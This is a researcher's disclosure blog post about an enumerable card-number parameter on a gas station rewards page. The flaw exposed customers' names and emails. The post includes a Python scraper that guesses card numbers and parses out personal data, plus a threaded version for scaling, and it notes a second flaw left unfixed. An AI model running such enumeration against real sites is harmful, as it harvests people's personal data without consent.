Leaky Gas Pump: Harvesting User Data From a Local Gas Station

Michael Gillespie
4 min read · Nov 7, 2020


Photo by sippakorn yamkasikorn on Unsplash

In late October this year, I was checking my personal mail, combing through the endless spam and rewards programs I've somehow signed myself up for. One of these (legitimate) rewards emails was from a local gas station: a coupon for 6 cents off per gallon, with a handy link to load it onto my rewards card (which is scanned at the pump). Nicely timed; I happened to need to fill up that weekend, so why not.

Coupon to load onto my rewards card

After clicking the link and being redirected through their third-party tracker URL, I am greeted with a confirmation for my discount. Alrighty, ready to head to the pump!

Reward confirmation (different reward pictured)

However… wait a minute. Is that my full name and personal email address on the page? I check, and I'm not actually logged into their website; going to "My Account" confirms I still need to log in. I quickly copy and paste the URL from the email into a new incognito window in Chrome, and aside from showing that the reward was already loaded, I still see my name and email address!

OK, surely this must be a special link from the email that is "authorizing" me as a one-time thing, something like a nonce.

Final URL from the coupon link

Nope. Just two parameters: a numeric card number, and the offer code itself. This piqued my interest as a cybersecurity researcher.
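To illustrate, the link boiled down to something like the following. The domain and parameter names here are made-up stand-ins; the real URL is only visible in the screenshot above:

```
https://rewards.example.com/reward?cardnumber=0123456789012345&offer=SAVE6
```

Anyone holding a link in this shape can swap in a different card number, which is the whole problem.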

Taking a look at the card number: it is simply a 16-digit number, and it matches my physical card. No obfuscation or hashing to be seen. So I start playing with it.

I start by incrementing my card number by one.

cardnumber+1

OK, so not every card number is sequentially valid… however, I start punching in some semi-random numbers, and…

cardnumber+rand()

Uh oh. That is totally not my name or email address, and yet I can view it easily.

So, at this point, we have everything we need to harvest user data: a URL with an enumerable parameter, and even a failure message when we guess a wrong card number. All we need now is a quick-and-dirty Python bot that uses the HTML structure to parse out the user data.

Inspecting the page structure
Simple Python scraper
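The scraper itself only appears in the post as a screenshot, but a minimal sketch of the approach might look like this. The endpoint, query parameters, failure text, and CSS class names below are all illustrative stand-ins; only the overall pattern (enumerate card numbers, check for the failure text, parse name and email out of the HTML) comes from the write-up.

```python
import random
import re
import urllib.request

# Hypothetical stand-ins -- the real site's URL, offer code, failure
# message, and markup are not reproduced in this post.
BASE_URL = "https://rewards.example.com/reward"
FAIL_TEXT = "Card not found"

NAME_RE = re.compile(r'<span class="member-name">([^<]+)</span>')
EMAIL_RE = re.compile(r'<span class="member-email">([^<]+)</span>')


def parse_member(html: str):
    """Return (name, email) parsed from the rewards page, or None if
    the page contains the failure text for an invalid card number."""
    if FAIL_TEXT in html:
        return None
    name = NAME_RE.search(html)
    email = EMAIL_RE.search(html)
    return (name.group(1) if name else "", email.group(1) if email else "")


def probe(card: int):
    """Fetch the rewards page for one card number and parse it."""
    url = f"{BASE_URL}?cardnumber={card:016d}&offer=SAVE6"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return parse_member(resp.read().decode("utf-8", "replace"))


def harvest_sample(attempts: int):
    """Probe random 16-digit card numbers; return the hits found."""
    hits = {}
    for _ in range(attempts):
        card = random.randrange(10**15, 10**16)
        record = probe(card)
        if record:
            hits[card] = record
    return hits
```

Since there is no session or authorization check to satisfy, each probe is just a single unauthenticated GET, which is what makes the enumeration so cheap.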

After working out a few kinks, such as finding a reasonable card number range, and discovering that some cards somehow had no name or email address registered (a good thing in this case), I was able to easily harvest information for about 300 valid users while I went to lunch.

Python bot in action

If I were a malicious actor, I could easily multi-thread this and distribute the load across a few machines. The only real bottleneck was the time for the HTTPS handshake, as there was definitely no throttling or any other security measure in place to prevent this.
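Multi-threading the harvester would be a few lines with Python's standard thread pool, since the per-request handshake latency overlaps across workers. The probe function here is a dummy stand-in for the single-card lookup; the real request logic is not shown in the post.

```python
from concurrent.futures import ThreadPoolExecutor


def probe(card: int):
    """Dummy stand-in for fetching and parsing one card's rewards page.
    Here we just pretend every even-numbered card is registered."""
    return ("Some Name", "some@email.example") if card % 2 == 0 else None


def harvest(cards, workers=16):
    """Probe many card numbers concurrently; handshake latency overlaps
    across threads, so throughput scales roughly with worker count."""
    cards = list(cards)
    results = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for card, hit in zip(cards, pool.map(probe, cards)):
            if hit:
                results[card] = hit
    return results
```

With I/O-bound requests like these, the thread pool (rather than multiple processes) is the natural fit, and raising `workers` trades politeness for speed until the server or network pushes back.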

I did confirm I could not access these accounts, but I could easily harvest a list of full names and email addresses. It doesn't take much to imagine the social engineering tricks or general spam you could pull off with this plus the knowledge of the gas station chain they frequent, which also narrows down their geolocation.

In the spirit of responsible disclosure, I attempted to reach out to the company. Their website had no web admin contact information, no contact form, and no security.txt on the domain. In the end, I was able to reach their support via Twitter DM, and after a few weeks, their development team fixed it by simply removing the information from the page when you are not logged in.

Rewards page no longer shows a name or email address

While investigating this, I also found I could arbitrarily add any (valid) reward to anyone's card. Making a bot that parses the page, grabs any rewards shown as applicable to a card, and makes another call to add them would be trivial. This flaw actually still exists; luckily, it lends itself more to charity work than to anything malicious I can think of.

Timeline:

  • 10/17/20 — bug discovered
  • 10/17/20 — reached out to support and received acknowledgement
  • 10/21/20 — received acknowledgement dev team is working on a fix
  • 10/30/20 — bug reported as fixed, confirmed
